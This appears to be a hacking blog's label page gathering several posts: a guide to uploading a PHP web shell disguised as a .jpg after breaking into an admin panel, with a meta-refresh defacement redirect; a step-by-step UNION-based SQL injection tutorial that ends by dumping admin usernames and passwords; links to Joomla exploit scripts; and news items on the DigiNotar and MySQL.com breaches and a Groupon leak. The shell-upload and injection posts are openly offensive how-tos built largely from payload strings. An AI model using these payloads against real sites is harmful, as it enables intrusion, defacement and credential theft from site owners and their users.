Showing posts with label Database Hacking. Show all posts
Showing posts with label Database Hacking. Show all posts
Execute and Access .jpg Shell on a webiste, and keep maintaining access
0
comments
vic
-
First of all, After hacking a admin panel of a website, find a place to upload image. And there instead of image you can upload your .jpg shell. Sometimes .php files are not allowed or there are restrictions on uploading .php files, So inorder to upload and execute for shell you have to change the extension of your shell.
Open your shell in notepad and then Save As and change the extension to any any one of the
shell.php;.jpg
shell.php.jpg
shell.php..jpg
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;
Suppose you have uploaded your shell in image section of the website, You will find your shell most of times here http://website/images/shell.php
If there is no upload section in the administrator panel of the website but there is a section where you can update or add news, you can use meta http-equiv to make redirection from website to your deface page.
Just add this code in news
<meta http-equiv="refresh" content="0;url=http://link_to_your_deface_page">
Now you can just open the shelf in your browser and then execute it whenever required as per your wish. Cheers:)
Open your shell in notepad and then Save As and change the extension to any any one of the
shell.php;.jpg
shell.php.jpg
shell.php..jpg
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;
Suppose you have uploaded your shell in image section of the website, You will find your shell most of times here http://website/images/shell.php
If there is no upload section in the administrator panel of the website but there is a section where you can update or add news, you can use meta http-equiv to make redirection from website to your deface page.
Just add this code in news
<meta http-equiv="refresh" content="0;url=http://link_to_your_deface_page">
Now you can just open the shelf in your browser and then execute it whenever required as per your wish. Cheers:)
HACK WEBSITES USING SQL INJECTION :: STEP BY STEP WEBSITE DEFACING
SQL Injection in MySQL Databases
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.
Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1
or
www.site.com/id=5
Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:
www.site.com/page=1'
If the database is vulnerable, the page will spit out a MySQL error such as;
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29
If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.
Step 2
Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:
www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--
If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.
Step 3
We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--
This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.
Step 4
We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database
For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--
The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.
Step 5
In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.
Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:
union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.
Step 7
Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--
Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website.
Source :[ Imagine Next : Lessons / Courses]
Joomla Hacking Tools: Hack Joomla with self-written tools by Valentin

#1
Joomla QPersonel Exploit
http://www.xenuser.org/exploits/joomla_com_qpersonel_sploit.py
#2
Automated Joomla SQL Injection Exploiterhttp://www.xenuser.org/exploits/joomla_sqli_sploiter.py
#3
Joomla BF Quiz Exploithttp://www.xenuser.org/exploits/joomla_com_bfquiz_sploit.py
#4
Column Fuzzerhttp://xenuser.org/tools/column_finder.py
#5
Simple SQL Injection Vulnerability Scannerhttp://www.xenuser.org/tools/sqli_scanner.py
#6
Simple Log File Analyzerhttp://www.xenuser.org/tools/scan_log.py
#7
Simple Local File Inclusion Exploiterhttp://www.xenuser.org/tools/lfi_sploiter.py
These tools can help you to exploit vulnerabilities within Joomla or some extensions.
NOTE: Read the help (included in those tools) for details.
The Simple Log File Analyzer could be used for scanning your Apache log files. It shows if there are hack attempts.
The Worst Security Hack Ever: Digital world also requires trust
Breach Extends Beyond the Victimized Company
September 22, 2011 - Eric ChabrowThe breach earlier this month of certificate authority DigiNotar could prove to be the worst security event ever to happen on the Internet because it threatens, at its core, a fundamental principle of Internet transactions - economic and social - trust.
Hackers broke into DigiNotar computers and stole the private key used by the Dutch company to assure the trustworthiness of the digital certificates it issued to website operators to guarantee users that the site visited is the one they intended to access. Employing the stolen private key, the hackers issued counterfeit certificates aimed at fooling visitors into believing some of the websitse they're accessing are the ones they intended to visit, and not the sham sites they've arrived at.
Functioning in our society, whether in the real or digital world, requires trust. 
Believed to be backers of the Iranian government, the hackers used the counterfeit certificates on Gmail, allowing them to direct users to a false site, in which they could spy on the messages dissidents sent, identifying them and those who they sent their e-mails. According to preliminary audit conducted by the IT security firm Fox-IT, more than 500 counterfeit DigiNotar certificates were issued to a wide range of organizations including the CIA; British and Israeli intelligence services; Internet companies Google, Microsoft and Mozilla; the social networks Facebook and Twitter; blog host Wordpress and credit-reporting agency Equifax.The problem is that there is no way for visitors to verify the validity of the certificates. Check the URL, and one sees the https (https://gmail.com, for instance) in the URL that authenticates a trusted site. Click on a browser icon such as a locked padlock, and the window that pops up confirms the certificate was issued by a legitimate certification authority, even if it's a fake one.
Of course, if the browser company knows of the issuance of counterfeit digital certificates under the brand of a legitimate company, it can remove that company's digital certificates from the list of verified certificates, as many did with DigiNotar. But most DigiNotar certificates are legitimate, and if they're not on the list of verified certificate authorities on Chrome, Internet Explore, Firefox and other browsers, legitimate certificates have the same value as the counterfeit ones.
For DigiNotar, the breach has led to its demise; a Dutch court is liquidating the company under that nation's bankruptcy's law (see DigiNotar Declares Bankruptcy). Yet, DigiNotar could prove to be but one small victim of this breach, a footnote, perhaps. That's because functioning in our society, whether in the real or digital world, requires trust. The fundamental precepts of IT security are availability, confidentiality and integrity. Add them together, they equate trust. The DigiNotar breach places in jeopardy those fundamental precepts of IT security. And that puts all of us in jeopardy.
What is DoS or DDoS attacks: Denial of Service Attack Tutorial
For any attack to be successful, there should be a vulnerability which exists in the system. Generally the vulnerabilities that exist in the software such as Operating System and Applications can be removed by implementing proper patch management solutions. But there exists an inherent vulnerability in all the systems which is called “Limitations” and that is the vulnerability that is being targeted by DoS or DDoS attacks.
To better understand that let us take an example of a fully patched web server hosting an e-commerce application, and availability of that application stands at the core of business for it to succeed. Now since the server that hosts the applications is most critical business asset it has been properly patched and any operating system or application assumingly does not have any vulnerabilities. But as any other system the server has following limitations.
• Bandwidth
• Memory
• Processing Power
If any or all of these resources are consumed to the fullest, the end user access to e-commerce application service would get affected, thus creating a denial of service affect.
An attack that would make a service go unavailable is called DoS attack. Apart from exploiting vulnerabilities as discussed above, the DoS attack can also be performed by exploiting resources limitations. Some of the attacks that are possible on any computer system are given below:
• Syn Flood
• UDP Flood
• Malformed Packets
• TCP RST Attack
• ICMP Flood
Since the attacker also uses a very similar computer system as that of Target, the attacker also suffers the same problem. That is to make the Target’s CPU go high, the attacker’s computer will also have to work hard enough thus making its own CPU go high. To over come these issues, attackers came with a new method where a small amount of attack can be initiated from large number of computer systems towards same target thus creating a DoS affect for target without creating one for self, and that method of attack is called Distributed Denial of Service Attack or in short DDoS attack.
MySQL and Sun websites hacked using SQL injection
MySQL.com, the official website of the database management system of the same name, was today subjected to an attack whereby hackers used SQL injection exploits to gain access to a complete list of usernames and passwords on the site.
News of the attack surfaced when the attackers posted details of the compromise on the Full Disclosure mailing list, publicly listing the contents of database tables used to store member and employee data, but also a small sample of user logins and password hashes.
Owned by Oracle, MySQL is used by millions of websites to store and deliver information, with some of the most popular online services and platforms including WordPress and Joomla utilising the software.
The attack was achieved using “blind SQL injection”, targeting MySQL.com, MySQL.fr, MySQL.de and MySQL.it, but also two Sun domains.
It appears that the attacks were not due to flaws in the MySQL software itself, but flaws in the implementation of their websites.
sqlmap 0.9 Released – SQL Injection Tool
After a year of hardcore development, sqlmap 0.9 is out!
Introduction:
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL Injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration testor and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL Injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration testor and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
New Features:
- Rewritten SQL injection detection engine
- Support to directly connect to the database without passing via a SQL injection, -d switch
- Added full support for both time-based blind SQL injection and error-based SQL injection techniques
- Implemented support for SQLite 2 and 3
- Implemented support for Firebird
- Implemented support for Microsoft Access, Sybase and SAP MaxDB
- Added support to tamper injection data with –tamper switch
- Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack
- Added support to fetch unicode data
- Added support to use persistent HTTP(s) connection for speed improvement, –keep-alive switch
- Implemented several optimization switches to speed up the exploitation of SQL injections
- Support to parse and test forms on target url, –forms switch
- Added switches to brute-force tables names and columns names with a dictionary attack, –common-tables and –common-columns.
Demo:
Download: sqlmap-0.9.tar.gz
Groupon Leaks Entire Indian User Database
The entire user database of Groupon’s Indian subsidiary Sosasta.com was accidentally published to the Internet and indexed by Google.
The database includes the e-mail addresses and clear-text passwords of the site’s 300,000 users. It was discovered by Australian security consultant Daniel Grzelak as he searched for publicly accessible databases containing e-mail address and password pairs.
Grzelak used Google to search for SQL database files that were web accessible and contained keywords like “password” and “gmail”.
“A few hours and tweaks later, this database came up,” he said. “I started scrolling, and scrolling and I couldn’t get to the bottom of the file. Then I realised how big it actually was.”
Grzelak contacted Risky.Biz after the Sosasta discovery to seek advice on disclosure. This website contacted the CEO of Groupon, Andrew Mason, who called back personally within 24 hours of initial contact.
The database was removed immediately and the company has launched an internal investigation to find out how it wound up publicly accessible in the first place.
Groupon is notifying all its Sosasta users of the incident and is advising them that the passwords they used on the website are now compromised and cannot be relied upon to secure other accounts.
Source: Risky.Biz
Sponsor
Cyber Security, News & Support, and Technology. Follow Us, Stay Connected and Be Safe.
Share It With Friends
Blog Archive
About Me
Tag Cloud
Admin Tools
(16)
Adobe
(1)
Adsense
(12)
Airtel Hacks
(1)
Android
(9)
Anonymous Hackers
(2)
Apple
(14)
Applications
(3)
ATM Machine
(1)
Backtrack
(3)
Batch Files
(1)
Blackberry
(1)
Blogger
(17)
Browsers
(1)
Bugs
(2)
Business
(1)
C source code
(2)
Camera Hack
(1)
Chat
(1)
Chrome Os
(1)
computer_tricks
(122)
Computing
(4)
Corporate
(9)
Cracks
(5)
Crimes
(2)
Cyber Attacks
(12)
Cyber Crimes
(4)
Cyber Security
(51)
Cyber Threat
(19)
cyber_news
(30)
Database Hacking
(8)
Defaced
(2)
Dos
(1)
Dos Commands
(1)
Dos Tricks
(2)
Downloads
(7)
E_Books
(8)
Easy Applications
(6)
Email Security
(1)
Emails
(2)
Encryption Tools
(2)
Entrepreneur
(3)
Ethical Hacking Tools
(53)
Ethical Hacking Tutorial
(134)
Ethical Hacking Videos'
(12)
examples
(5)
Exploit
(19)
Facebook
(36)
Fakes
(1)
Featured
(19)
Footprinting
(3)
Gadgets
(20)
Gadgets_news
(14)
games
(3)
Gmail
(5)
Google
(32)
Google Dorks
(2)
Google+
(17)
Hacked
(3)
Hackers
(16)
Hacking
(74)
Hacking News
(4)
Hacking Softwares
(139)
Hacking Techniques
(112)
Hacking Tools
(144)
Hacking_news
(45)
Hacking_terms
(38)
Hackng with Mobile
(4)
Internet_Tricks
(3)
Java-Script Hacks
(1)
Keyloggers
(2)
Keys
(1)
Laptops
(1)
Latest Mobile Phones
(3)
Lecture
(1)
Linux
(6)
Loophole
(10)
Making Applications
(1)
Metasploit
(1)
Mobile
(11)
Mobile Applications
(3)
Mobile_tricks
(15)
Network Security
(6)
news
(50)
Nokia
(2)
Notepad Hacks
(1)
Operating Systems
(11)
Oracle
(1)
Password Cracking
(9)
Pendrive
(3)
penetration testing
(32)
phase_hacking
(9)
phishing
(6)
Photoshop
(11)
Programs
(1)
Protection Tools
(17)
Proxy
(2)
Scripting
(1)
Secure Computing
(38)
Security Bleach
(5)
Seminars_Work Shops_Demo
(5)
SEO
(15)
shell
(2)
shortcuts
(2)
Social Networking
(6)
Software
(70)
source
(4)
source code
(4)
SQL Injection
(9)
System security
(30)
Techie
(4)
Technology
(5)
The Pirate Bay
(1)
Torrent
(1)
Touch
(5)
Ubuntu
(3)
Updates
(2)
Video Tutorials
(4)
Virus
(20)
Vulnerability scanner
(9)
Vulnerable
(11)
Web Security
(13)
Web Traffic
(1)
Wifi Cracking
(2)
Windows
(7)
Windows Xp Tricks
(4)
Wireless hacking
(7)
workshop
(2)
Workshops and Seminars
(2)
worms
(1)
Xss Attack
(2)
Yahoo Messenger
(1)
